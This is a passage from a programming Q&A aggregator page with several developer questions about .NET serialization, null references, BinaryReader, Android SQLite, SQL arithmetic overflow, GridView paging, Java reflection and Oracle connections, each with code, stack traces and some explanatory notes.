            at System.Deployment.Application.ApplicationActivator.PerformDeploymentActivation(Uri activationUri, Boolean isShortcut, String textualSubId, String deploymentProviderUrlFromExtension, BrowserSettings browserSettings, String& errorPageUrl)
            at System.Deployment.Application.ApplicationActivator.ActivateDeploymentWorker(Object state)

    I'm not sure what else to do. The only slightly unusual thing I used in this application is SQL Server Compact. Any help would be appreciated.

    Thanks,
    Andrew


  • SerializationException Occurring Only in Release Mode

    - by Calvin Nguyen
    Hi, I am working on an ASP.NET web app using Visual Studio 2008 and a third-party library. Things are fine in my development environment. Things are also good if the web app is deployed in Debug configuration. However, when it is deployed in Release mode, SerializationExceptions appear intermittently, breaking other functionality. In the Windows event log, the following error can be seen:

        "An unhandled exception occurred and the process was terminated.
        Application ID: DefaultDomain
        Process ID: 3972
        Exception: System.Runtime.Serialization.SerializationException
        Message: Unable to find assembly 'MyThirdPartyLibrary, Version=1.234.5.67, Culture=neutral, PublicKeyToken=3d67ed1f87d44c89'.
        StackTrace:
            at System.Runtime.Serialization.Formatters.Binary.BinaryAssemblyInfo.GetAssembly()
            at System.Runtime.Serialization.Formatters.Binary.ObjectReader.GetType(BinaryAssemblyInfo assemblyInfo, String name)
            at System.Runtime.Serialization.Formatters.Binary.ObjectMap..ctor(String objectName, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable)
            at System.Runtime.Serialization.Formatters.Binary.ObjectMap.Create(String name, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable)
            at System.Runtime.Serialization.Formatters.Binary.__BinaryParser.ReadObjectWithMapTyped(BinaryObjectWithMapTyped record)
            at System.Runtime.Serialization.Formatters.Binary.__BinaryParser.ReadObjectWithMapTyped(BinaryHeaderEnum binaryHeaderEnum)
            at System.Runtime.Serialization.Formatters.Binary.__BinaryParser.Run()
            at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(HeaderHandler handler, __BinaryParser serParser, Boolean fCheck, Boolean isCrossAppDomain, IMethodCallMessage methodCallMessage)
            at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream, HeaderHandler handler, Boolean fCheck, Boolean isCrossAppDomain, IMethodCallMessage methodCallMessage)
            at System.Runtime.Remoting.Channels.CrossAppDomainSerializer.DeserializeObject(MemoryStream stm)
            at System.AppDomain.Deserialize(Byte[] blob)
            at System.AppDomain.UnmarshalObject(Byte[] blob)
        For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp."

    Using FUSLOGVW.exe (i.e., the Assembly Binding Log Viewer), I can see the problem is that IIS attempts to find MyThirdPartyLibrary in the directory C:\windows\system32\inetsrv. It refuses to look in the bin folder of the web app, where the DLL is actually located.

    Does anyone know what the problem is?

    Thanks,
    Calvin
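    (An observation plus a general-purpose sketch, not a confirmed fix for this thread: the stack trace shows the failure in the default AppDomain ("Application ID: DefaultDomain", ending in AppDomain.UnmarshalObject); that is, an object or exception is being serialized across AppDomain boundaries, and the receiving domain probes the process directory rather than the web app's bin, which matches what FUSLOGVW shows. Typical mitigations are installing the assembly in the GAC, or hooking AssemblyResolve in whichever domain performs the deserialization:)

        // Resolve assemblies from the web app's bin folder when normal probing fails.
        AppDomain.CurrentDomain.AssemblyResolve += (sender, args) =>
        {
            string name = new System.Reflection.AssemblyName(args.Name).Name + ".dll";
            string candidate = System.IO.Path.Combine(
                AppDomain.CurrentDomain.SetupInformation.ApplicationBase, "bin", name);
            return System.IO.File.Exists(candidate)
                ? System.Reflection.Assembly.LoadFrom(candidate)
                : null;
        };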


  • object reference not set to an instance of object exception coming at runtime.

    - by amby
    Hi, I am getting this error at runtime: "object reference not set to an instance of an object". My question is whether I am using the StringBuilder array correctly here, because I am new to C# and I think the problem is with my StringBuilder array. Below is the code:

        using System;
        using System.Collections.Generic;
        using System.Linq;
        using System.Web;
        using System.Web.Services;
        using System.Web.UI;
        using System.Web.UI.WebControls;
        using System.Data;
        using System.Text;
        using System.Web.Script.Serialization;
        using System.Web.Script.Services;
        using System.Collections;

        public partial class Testing : System.Web.UI.Page
        {
            protected void Page_Load(object sender, EventArgs e)
            {
            }

            [WebMethod]
            public static string SendMessage()
            {
                try
                {
                    al2c00.ldap ws = new al2c00.ldap();
                    Hashtable htPeople = new Hashtable();
                    //DataTable dt = ws.GetEmployeeDetailsBy_NTID("650FA25C-9561-430B-B757-835D043EA5E5", "john");
                    StringBuilder[] empDetails = new StringBuilder[100];
                    string num = "ambreen";
                    empDetails[0].Append("amby");
                    num = empDetails[0].ToString();
                    htPeople.Add("bellempposreport", num);
                    JavaScriptSerializer jss = new JavaScriptSerializer();
                    string output = jss.Serialize(htPeople);
                    return output;
                }
                catch (Exception ex)
                {
                    return ex.Message + "-" + ex.StackTrace;
                }
            }
        }

    Please tell me what I am doing wrong here.
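    (For what it's worth, a general C# point rather than anything stated in the original post: new StringBuilder[100] allocates an array of 100 references that are all initially null, so empDetails[0].Append("amby") dereferences null and throws exactly this exception. Each element has to be instantiated before use:)

        StringBuilder[] empDetails = new StringBuilder[100];
        empDetails[0] = new StringBuilder();    // create the instance first
        empDetails[0].Append("amby");
        string num = empDetails[0].ToString();  // "amby"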


  • C# Error reading two dates from a binary file

    - by Jamie
    Hi all, when reading two dates from a binary file I'm seeing the error below:

        "The output char buffer is too small to contain the decoded characters, encoding 'Unicode (UTF-8)' fallback 'System.Text.DecoderReplacementFallback'. Parameter name: chars"

    My code is below:

        static DateTime[] ReadDates()
        {
            System.IO.FileStream appData = new System.IO.FileStream(
                appDataFile, System.IO.FileMode.Open, System.IO.FileAccess.Read);

            List<DateTime> result = new List<DateTime>();
            using (System.IO.BinaryReader br = new System.IO.BinaryReader(appData))
            {
                while (br.PeekChar() > 0)
                {
                    result.Add(new DateTime(br.ReadInt64()));
                }
                br.Close();
            }
            return result.ToArray();
        }

        static void WriteDates(IEnumerable<DateTime> dates)
        {
            System.IO.FileStream appData = new System.IO.FileStream(
                appDataFile, System.IO.FileMode.Create, System.IO.FileAccess.Write);

            List<DateTime> result = new List<DateTime>();
            using (System.IO.BinaryWriter bw = new System.IO.BinaryWriter(appData))
            {
                foreach (DateTime date in dates)
                    bw.Write(date.Ticks);
                bw.Close();
            }
        }

    What could be the cause? Thanks
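    (A likely explanation, a well-known BinaryReader pitfall rather than something from the original thread: PeekChar() tries to decode the next bytes as text, and arbitrary Int64 tick values are frequently not valid UTF-8, which is what trips the decoder. A sketch of the usual fix for the loop in ReadDates is to compare stream positions instead of peeking:)

        using (var br = new System.IO.BinaryReader(appData))
        {
            // Compare raw positions instead of asking the reader to decode characters.
            while (br.BaseStream.Position < br.BaseStream.Length)
                result.Add(new DateTime(br.ReadInt64()));
        }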


  • Android SQLite Problem: Program Crash When Try a Query!

    - by Skatephone
    Hi, I have a problem programming with the Android SDK 1.6. I'm doing the same things as in the "notepad example", but the program crashes when I try some queries. If I run a query directly in the DatabaseHelper's onCreate() method it works, but outside of that method it doesn't. Do you have any idea? This is the source:

        public class DbAdapter {
            public static final String KEY_NAME = "name";
            public static final String KEY_TOT_DAYS = "totdays";
            public static final String KEY_ROWID = "_id";
            private static final String TAG = "DbAdapter";

            private DatabaseHelper mDbHelper;
            private SQLiteDatabase mDb;

            private static final String DATABASE_NAME = "flowratedb";
            private static final String DATABASE_TABLE = "girl_data";
            private static final String DATABASE_TABLE_2 = "girl_cyle";
            private static final int DATABASE_VERSION = 2;

            /**
             * Database creation sql statement
             */
            private static final String DATABASE_CREATE =
                "create table " + DATABASE_TABLE + " (id integer, name text not null, totdays int);";
            private static final String DATABASE_CREATE_2 =
                "create table " + DATABASE_TABLE_2 + " (ref_id integer, day long not null);";

            private final Context mCtx;

            private static class DatabaseHelper extends SQLiteOpenHelper {
                DatabaseHelper(Context context) {
                    super(context, DATABASE_NAME, null, DATABASE_VERSION);
                }

                @Override
                public void onCreate(SQLiteDatabase db) {
                    db.execSQL(DATABASE_CREATE);
                    db.execSQL(DATABASE_CREATE_2);
                    db.delete(DATABASE_TABLE, null, null);
                    db.delete(DATABASE_TABLE_2, null, null);
                }

                @Override
                public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
                    Log.w(TAG, "Upgrading database from version " + oldVersion + " to " + newVersion
                            + ", which will destroy all old data");
                    db.execSQL("DROP TABLE IF EXISTS " + DATABASE_TABLE);
                    db.execSQL("DROP TABLE IF EXISTS " + DATABASE_TABLE_2);
                    onCreate(db);
                }
            }

            public DbAdapter(Context ctx) {
                this.mCtx = ctx;
            }

            public DbAdapter open() throws SQLException {
                mDbHelper = new DatabaseHelper(mCtx);
                mDb = mDbHelper.getWritableDatabase();
                return this;
            }

            public void close() {
                mDbHelper.close();
            }

            public long createGirl(int id, String name, int totdays) {
                ContentValues initialValues = new ContentValues();
                initialValues.put(KEY_ROWID, id);
                initialValues.put(KEY_NAME, name);
                initialValues.put(KEY_TOT_DAYS, totdays);
                return mDb.insert(DATABASE_TABLE, null, initialValues);
            }

            public long createGirl_fd_day(int refid, long fd) {
                ContentValues initialValues = new ContentValues();
                initialValues.put("ref_id", refid);
                initialValues.put("calendar", fd);
                return mDb.insert(DATABASE_TABLE, null, initialValues);
            }

            public boolean updateGirl(int rowId, String name, int totdays) {
                ContentValues args = new ContentValues();
                args.put(KEY_NAME, name);
                args.put(KEY_TOT_DAYS, totdays);
                return mDb.update(DATABASE_TABLE, args, KEY_ROWID + "=" + rowId, null) > 0;
            }

            public boolean deleteGirlsData() {
                if (mDb.delete(DATABASE_TABLE_2, null, null) > 0)
                    if (mDb.delete(DATABASE_TABLE, null, null) > 0)
                        return true;
                return false;
            }

            public Bundle fetchAllGirls() {
                Bundle extras = new Bundle();
                Cursor cur = mDb.query(DATABASE_TABLE,
                        new String[] {KEY_ROWID, KEY_NAME, KEY_TOT_DAYS},
                        null, null, null, null, null);
                cur.moveToFirst();
                int tot = cur.getCount();
                extras.putInt("tot", tot);
                int index;
                for (int i = 0; i < tot; i++) {
                    index = cur.getInt(cur.getColumnIndex("_id"));
                    extras.putString("name" + index, cur.getString(cur.getColumnIndex("name")));
                    extras.putInt("totdays" + index, cur.getInt(cur.getColumnIndex("totdays")));
                }
                cur.close();
                return extras;
            }

            public Cursor fetchGirl(int rowId) throws SQLException {
                Cursor mCursor = mDb.query(true, DATABASE_TABLE,
                        new String[] {KEY_ROWID, KEY_NAME, KEY_TOT_DAYS},
                        KEY_ROWID + "=" + rowId, null, null, null, null, null);
                if (mCursor != null) {
                    mCursor.moveToFirst();
                }
                return mCursor;
            }

            public Cursor fetchGirlCD(int rowId) throws SQLException {
                Cursor mCursor = mDb.query(true, DATABASE_TABLE_2,
                        new String[] {"ref_id", "day"},
                        "ref_id=" + rowId, null, null, null, null, null);
                if (mCursor != null) {
                    mCursor.moveToFirst();
                }
                return mCursor;
            }
        }

    Thanks, Valerio from Italy :)
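    (Two observations from the posted source itself, not a confirmed answer: createGirl_fd_day() puts the value under the key "calendar" and inserts into DATABASE_TABLE (girl_data), but no "calendar" column exists anywhere in the schema; the companion table girl_cyle (DATABASE_TABLE_2) is the one with the ref_id/day columns, so that insert was presumably meant to target it with the key "day". Also, onCreate() only runs when the database file is first created, so if the schema changed after the first run, DATABASE_VERSION must be bumped for onUpgrade() to rebuild the tables.)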


  • Silverlight and WCF Ria Services

    - by Flex_Addicted
    Hi guys, I've created a new Silverlight 3 Business Application with VS2008. The creation completed correctly. When I try to open the XAML, it opens, but in the meantime this error is shown:

        Failed to load metadata assembly System.Windows.Controls.Data.Input.Design, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35.
        Exception message: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.
        Stack Trace:
            at System.Reflection.Module._GetTypesInternal(StackCrawlMark& stackMark)
            at System.Reflection.Assembly.GetTypes()
            at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)

        An exception of type ArgumentNullException was caught when calling IRegisterMetadata on type System.Windows.Controls.Data.Input.VisualStudio.Design.MetadataRegistration.
        Exception Message: Value cannot be null. Parameter name: type.
        Stack Trace:
            at Microsoft.Windows.Design.Metadata.AttributeTableBuilder.AddCallback(Type type, AttributeCallback callback)
            at System.Windows.Controls.Data.Input.VisualStudio.Design.MetadataRegistration.AddAttributes(AttributeTableBuilder builder)
            at System.Windows.Controls.Design.Common.MetadataRegistrationBase.BuildAttributeTable()
            at System.Windows.Controls.Data.Input.VisualStudio.Design.MetadataRegistration.Register()
            at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)

        Failed to load metadata assembly System.Windows.Controls.Design, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35.
        Exception message: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.
        Stack Trace:
            at System.Reflection.Module._GetTypesInternal(StackCrawlMark& stackMark)
            at System.Reflection.Assembly.GetTypes()
            at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)

        Failed to load metadata assembly System.Windows.Controls.Navigation.Design, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35.
        Exception message: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.
        Stack Trace:
            at System.Reflection.Module._GetTypesInternal(StackCrawlMark& stackMark)
            at System.Reflection.Assembly.GetTypes()
            at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)

    Why? Any solutions? Thank you in advance.


  • sql exception arithmetic overflow?

    - by MyHeadHurts
    In my program the user imports a date, and it works whenever the year is 2011, but if I try a date in 2010 I get this error, which is weird:

        [SqlException (0x80131904): Arithmetic overflow error converting int to data type numeric.]
            System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +1950890
            System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +4846875
            System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194
            System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392
            System.Data.SqlClient.SqlDataReader.HasMoreRows() +157
            System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +197
            System.Data.SqlClient.SqlDataReader.Read() +9
            System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +78
            System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +164
            System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +282
            System.Data.Common.LoadAdapter.FillFromReader(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +19
            System.Data.DataTable.Load(IDataReader reader, LoadOption loadOption, FillErrorEventHandler errorHandler) +222
            System.Data.DataTable.Load(IDataReader reader) +14

    The query:

        (
            @YearToGet int,
            @current datetime,
            @y int,
            @search datetime
        )
        AS
        SET @YearToGet = 2006;

        WITH Years AS (
            SELECT DATEPART(year, GETDATE()) [Year]
            UNION ALL
            SELECT [Year]-1 FROM Years WHERE [Year]>@YearToGet
        ),
        q_00 as (
            select DIVISION, DYYYY, sum(PARTY) as asofPAX, sum(InsAmount) as asofSales
            from dbo.B101BookingsDetails
            INNER JOIN Years ON B101BookingsDetails.DYYYY = Years.Year
            where Booked <= CONVERT(int, DateAdd(year, (Years.Year - @y), @search))
              and DYYYY = Years.Year
            group by DIVISION, DYYYY, years.year
            having DYYYY = years.year
        ),
        q_01 as (
            select DIVISION, DYYYY, sum(PARTY) as YEPAX, sum(InsAmount) as YESales
            from dbo.B101BookingsDetails
            INNER JOIN Years ON B101BookingsDetails.DYYYY = Years.Year
            group by DIVISION, DYYYY, years.year
            having DYYYY = years.year
        ),
        q_02 as (
            select DIVISION, DYYYY, sum(PARTY) as CurrentPAX, sum(InsAmount) as CurrentSales
            from dbo.B101BookingsDetails
            INNER JOIN Years ON B101BookingsDetails.DYYYY = Years.Year
            where Booked <= CONVERT(int, @current)
              and DYYYY = (year( getdate() ))
            group by DIVISION, DYYYY
        )
        select a.DIVISION, a.DYYYY, asofPAX, asofSales, YEPAX, YESales, CurrentPAX, CurrentSales,
               asofsales / ISNULL(NULLIF(yesales,0),1) as percentsales,
               CAST((asofpax) AS DECIMAL(5,1)) / yepax as percentpax
        from q_00 as a
        join q_01 as b on (b.DIVISION = a.DIVISION and b.DYYYY = a.DYYYY)
        join q_02 as c on (b.DIVISION = c.DIVISION)
        JOIN Years as d on (b.dyyyy = d.year)
        where A.DYYYY <> (year( getdate() ))
        order by a.DIVISION, a.DYYYY;
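    (A guess grounded in the error text rather than a confirmed answer: the only int-to-numeric conversion in the query is CAST(asofpax AS DECIMAL(5,1)), and DECIMAL(5,1) tops out at 9999.9. A completed year like 2010 plausibly has sum(PARTY) of 10000 or more, while the partial current year does not, which would explain why only older dates overflow; widening the cast, e.g. to DECIMAL(12,1), would be the first thing to try.)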


  • Custom pager in my Gridview 1st time works, next doesn't :

    - by gre3ns0ul
    Hi guys, I have a strange problem. I am extending a control from a GridView and adding a dropdown to page to the page I want. My custom GridView adds an ITemplate that contains four image buttons and one DropDownList (the four image buttons are first, prev, next, last; the dropdown picks the page), and adds it to the custom GridView. I wired a SelectedIndexChanged event to the dropdown, to fire when the index changes.

    The problem is: the first time I load the page with my control, everything is really OK. But when I change the index, in debug I see the control's constructor run and the footer template get created, and guess what: the index-changed method isn't fired, and the page returns an exception saying:

        Unable to cast object of type 'System.Web.UI.WebControls.ImageButton' to type 'System.Web.UI.WebControls.Table'.

        [InvalidCastException: Unable to cast object of type 'System.Web.UI.WebControls.ImageButton' to type 'System.Web.UI.WebControls.Table'.]
            System.Web.UI.WebControls.GridView.PrepareControlHierarchy() +122
            System.Web.UI.WebControls.GridView.Render(HtmlTextWriter writer, Boolean renderPanel) +50
            System.Web.UI.WebControls.GridView.Render(HtmlTextWriter writer) +33
            System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
            System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
            System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25
            System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +134
            System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19
            System.Web.UI.Control.Render(HtmlTextWriter writer) +10
            ...

    I appreciate the help, thanks.


  • Generate java class and call it's method dynamically

    - by Jacob
    package reflection;

        import java.io.*;
        import java.lang.reflect.*;

        class class0 {
            public void writeout0() {
                System.out.println("class0");
            }
        }

        class class1 {
            public void writeout1() {
                System.out.println("class1");
            }
        }

        class class2 {
            public void writeout2() {
                System.out.println("class2");
            }
        }

        class class3 {
            public void run() {
                try {
                    BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
                    String line = reader.readLine();
                    Class cls = Class.forName(line);
                    // define method here
                } catch (Exception ee) {
                    System.out.println("here " + ee);
                }
            }

            public void writeout3() {
                System.out.println("class3");
            }
        }

        class class4 {
            public void writeout4() {
                System.out.println("class4");
            }
        }

        class class5 {
            public void writeout5() {
                System.out.println("class5");
            }
        }

        class class6 {
            public void writeout6() {
                System.out.println("class6");
            }
        }

        class class7 {
            public void writeout7() {
                System.out.println("class7");
            }
        }

        class class8 {
            public void writeout8() {
                System.out.println("class8");
            }
        }

        class class9 {
            public void writeout9() {
                System.out.println("class9");
            }
        }

        class testclass {
            public static void main(String[] args) {
                System.out.println("Write class name : ");
                class3 example = new class3();
                example.run();
            }
        }

    The question: the third class reads a class name as a String from the console. Upon reading the name, it should dynamically instantiate that class and call its writeout method; if a class is not read from the input, it should not be initialized. But I can't continue any more; I need to do something more in class3. What can I do? Thanks.
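    (For reference, the standard reflection route at the "define method here" point, in outline: instantiate with cls.newInstance(), then either look the method up by its exact name, e.g. cls.getMethod("writeout" + line.charAt(line.length() - 1)), or iterate cls.getDeclaredMethods() for a name starting with "writeout", and call invoke(instance) on it. The suffix derivation is an assumption based on the writeout0..writeout9 naming in the posted classes, not something stated in the thread.)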

    Read the article

  • Connect to a remote Oracle 11g server using OracleClient of .NET 2.0

    - by Raghu M
    I have to connect to an Oracle server on the network from a .NET / C# (WinForms) application. I am trying to use System.Data.OracleClient, but in vain. Here are the details that might help someone reading this question:

    Platform: Visual Studio 2005 / .NET 2.0 with C# on Windows Vista Home Premium
    Library: System.Data.OracleClient
    Server: Oracle 11g (located on the same LAN)

    Please note that I don't have Oracle installed locally, and I have hunted every discussion forum possible for help, but most of them assume a local Oracle installation! Here is my connection string:

    "User Id=TSUSER;Password=ts12TS;Data Source=(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=MyServerIP)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=ORCL)));"

    And I get this error: OCIEnvCreate failed with return code -1 but error message text was not available.

    Stack trace:
       at System.Data.OracleClient.OciHandle..ctor(OciHandle parentHandle, HTYPE handleType, MODE ocimode, HANDLEFLAG handleflags)
       at System.Data.OracleClient.OracleInternalConnection.OpenOnLocalTransaction(String userName, String password, String serverName, Boolean integratedSecurity, Boolean unicode, Boolean omitOracleConnectionName)
       at System.Data.OracleClient.OracleInternalConnection..ctor(OracleConnectionString connectionOptions)
       at System.Data.OracleClient.OracleConnectionFactory.CreateConnection(DbConnectionOptions options, Object poolGroupProviderInfo, DbConnectionPool pool, DbConnection owningObject)
       at System.Data.ProviderBase.DbConnectionFactory.CreatePooledConnection(DbConnection owningConnection, DbConnectionPool pool, DbConnectionOptions options)
       at System.Data.ProviderBase.DbConnectionPool.CreateObject(DbConnection owningObject)
       at System.Data.ProviderBase.DbConnectionPool.UserCreateRequest(DbConnection owningObject)
       at System.Data.ProviderBase.DbConnectionPool.GetConnection(DbConnection owningObject)
       at System.Data.ProviderBase.DbConnectionFactory.GetConnection(DbConnection owningConnection)
       at System.Data.ProviderBase.DbConnectionClosed.OpenConnection(DbConnection outerConnection, DbConnectionFactory connectionFactory)
       at System.Data.OracleClient.OracleConnection.Open()
       at DGKit.Util.DataUtil.Generate() in D:\SVNRoot\sandbox\DGDev\Util\DataUtil.cs:line 68
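    In general, System.Data.OracleClient calls into the unmanaged Oracle client (OCI) libraries, so OCIEnvCreate failing at OciHandle construction usually means no Oracle client is installed on the local machine rather than a problem with the server; that diagnosis is a common one, not something confirmed in the post. A minimal sketch of the connection attempt once a client such as Oracle Instant Client is present on the machine:

    using System;
    using System.Data.OracleClient; // requires the unmanaged Oracle client libraries locally

    class OracleProbe
    {
        static void Main()
        {
            string connStr =
                "User Id=TSUSER;Password=ts12TS;" +
                "Data Source=(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=MyServerIP)(PORT=1521))" +
                "(CONNECT_DATA=(SERVICE_NAME=ORCL)));";

            using (OracleConnection conn = new OracleConnection(connStr))
            {
                try
                {
                    conn.Open();
                    Console.WriteLine("Connected, server version {0}", conn.ServerVersion);
                }
                catch (OracleException ex)
                {
                    // OCIEnvCreate errors surface here when the client libraries are missing.
                    Console.Error.WriteLine("Open failed: {0}", ex.Message);
                }
            }
        }
    }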

    Read the article

  • Intermittent asp.net mvc exception: “A public action method ABC could not be found on controller XYZ”

    - by Chris Schoon
    Hi, I'm getting an intermittent exception saying that ASP.NET MVC can’t find the action method. Here’s the exception:

    A public action method 'Fill' could not be found on controller 'Schoon.Form.Web.Controllers.ChrisController'.

    I think I have the routing set up correctly because this application works most of the time. Here is the controller’s action method:

    [ActionName("Fill")]
    [AcceptVerbs(HttpVerbs.Get | HttpVerbs.Post), UserIdFilter, DTOFilter]
    public ActionResult Fill(int userId, int subscriberId, DisplayMode? mode)
    {
        //…
    }

    The route:

    routes.MapRoute(
        "SchoonForm",
        "Form/Fill/{subscriberId}",
        new { controller = "ChrisController", action = "Fill" },
        new { subscriberId = @"\d+" }
    );

    And here is the stack:

    System.Web.HttpException: A public action method 'Fill' could not be found on controller 'Schoon.Form.Web.Controllers.ChrisController'.
       at System.Web.Mvc.Controller.HandleUnknownAction(String actionName) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\Controller.cs:line 197
       at System.Web.Mvc.Controller.ExecuteCore() in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\Controller.cs:line 164
       at System.Web.Mvc.ControllerBase.Execute(RequestContext requestContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\ControllerBase.cs:line 76
       at System.Web.Mvc.ControllerBase.System.Web.Mvc.IController.Execute(RequestContext requestContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\ControllerBase.cs:line 87
       at System.Web.Mvc.MvcHandler.ProcessRequest(HttpContextBase httpContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\MvcHandler.cs:line 80
       at System.Web.Mvc.MvcHandler.ProcessRequest(HttpContext httpContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\MvcHandler.cs:line 68
       at System.Web.Mvc.MvcHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext httpContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\MvcHandler.cs:line 104
       at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
       at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)

    Here is an example of my filters; they all work the same way:

    public class UserIdFilter : ActionFilterAttribute
    {
        public override void OnActionExecuting(ActionExecutingContext filterContext)
        {
            const string Key = "userId";
            if (filterContext.ActionParameters.ContainsKey(Key))
            {
                filterContext.ActionParameters[Key] = // get the user id from session or cookie
            }
            base.OnActionExecuting(filterContext);
        }
    }

    Thanks, Chris
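    One way to see what the failing requests actually look like is to log them at the point the exception originates: Controller.HandleUnknownAction is virtual, so the controller can record the verb and URL before delegating to the default behavior. This is a diagnostic sketch, not a confirmed fix; the trace sink is illustrative. Logging the verb often reveals that intermittent failures like this are requests with verbs other than GET/POST (e.g. HEAD from a crawler) being rejected by the AcceptVerbs filter:

    using System.Web.Mvc;

    public class ChrisController : Controller
    {
        // ... existing Fill action omitted ...

        // Called by MVC whenever action selection fails for this controller.
        protected override void HandleUnknownAction(string actionName)
        {
            System.Diagnostics.Trace.TraceError(
                "Unknown action '{0}': verb={1} url={2}",
                actionName, Request.HttpMethod, Request.RawUrl);

            base.HandleUnknownAction(actionName); // preserves the original exception
        }
    }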

    Read the article

  • How to get more detail from an exception?

    - by cusimar9
    I have a .NET 4.0 web application which implements an error handler within the Application_Error event of Global.asax. When an exception occurs, this intercepts it and sends me an email including a variety of information, like the logged-in user, the page the error occurred on, the contents of the session, etc. This is all great, but there is some fundamental detail missing which I seem unable to locate. For instance, this is a subset of an error I would receive and the associated stack trace:

    Source: Telerik.Web.UI
    Message: Selection out of range
    Parameter name: value

    Stack trace:
       at Telerik.Web.UI.RadComboBox.PerformDataBinding(IEnumerable dataSource)
       at Telerik.Web.UI.RadComboBox.OnDataSourceViewSelectCallback(IEnumerable data)
       at System.Web.UI.DataSourceView.Select(DataSourceSelectArguments arguments, DataSourceViewSelectCallback callback)
       at Telerik.Web.UI.RadComboBox.OnDataBinding(EventArgs e)
       at Telerik.Web.UI.RadComboBox.PerformSelect()
       at System.Web.UI.WebControls.BaseDataBoundControl.DataBind()
       at Telerik.Web.UI.RadComboBox.DataBind()
       at System.Web.UI.WebControls.BaseDataBoundControl.EnsureDataBound()
       at Telerik.Web.UI.RadComboBox.OnPreRender(EventArgs e)
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Control.PreRenderRecursiveInternal()
       at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)

    Now, as lovely as this is, I could do with knowing a) the name of the control and b) the value which caused the control to be 'out of range'. Any suggestions about how I could get this sort of information? I've run this in debug mode and the objects passed to Global.asax don't seem to hold any more detail that I can see.
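    The exception object itself won't name the control, but the request that triggered it usually will: the posted form contains the UniqueID and submitted value of every control on the page, and the inner-exception chain often carries more detail than the outermost message. A minimal sketch of collecting both inside Application_Error; the mail helper is a hypothetical stand-in for the existing email code:

    using System;
    using System.Text;
    using System.Web;

    public class Global : HttpApplication
    {
        protected void Application_Error(object sender, EventArgs e)
        {
            Exception ex = Server.GetLastError();
            StringBuilder report = new StringBuilder();
            report.AppendLine("Url: " + Request.RawUrl);

            // Walk the inner exceptions: the outermost HttpUnhandledException
            // frequently hides the real failure one or two levels down.
            for (Exception cur = ex; cur != null; cur = cur.InnerException)
            {
                report.AppendLine(cur.GetType().FullName + ": " + cur.Message);
                report.AppendLine(cur.StackTrace);
            }

            // The posted form values, keyed by each control's UniqueID, usually
            // reveal which control held the out-of-range value.
            foreach (string key in Request.Form.Keys)
            {
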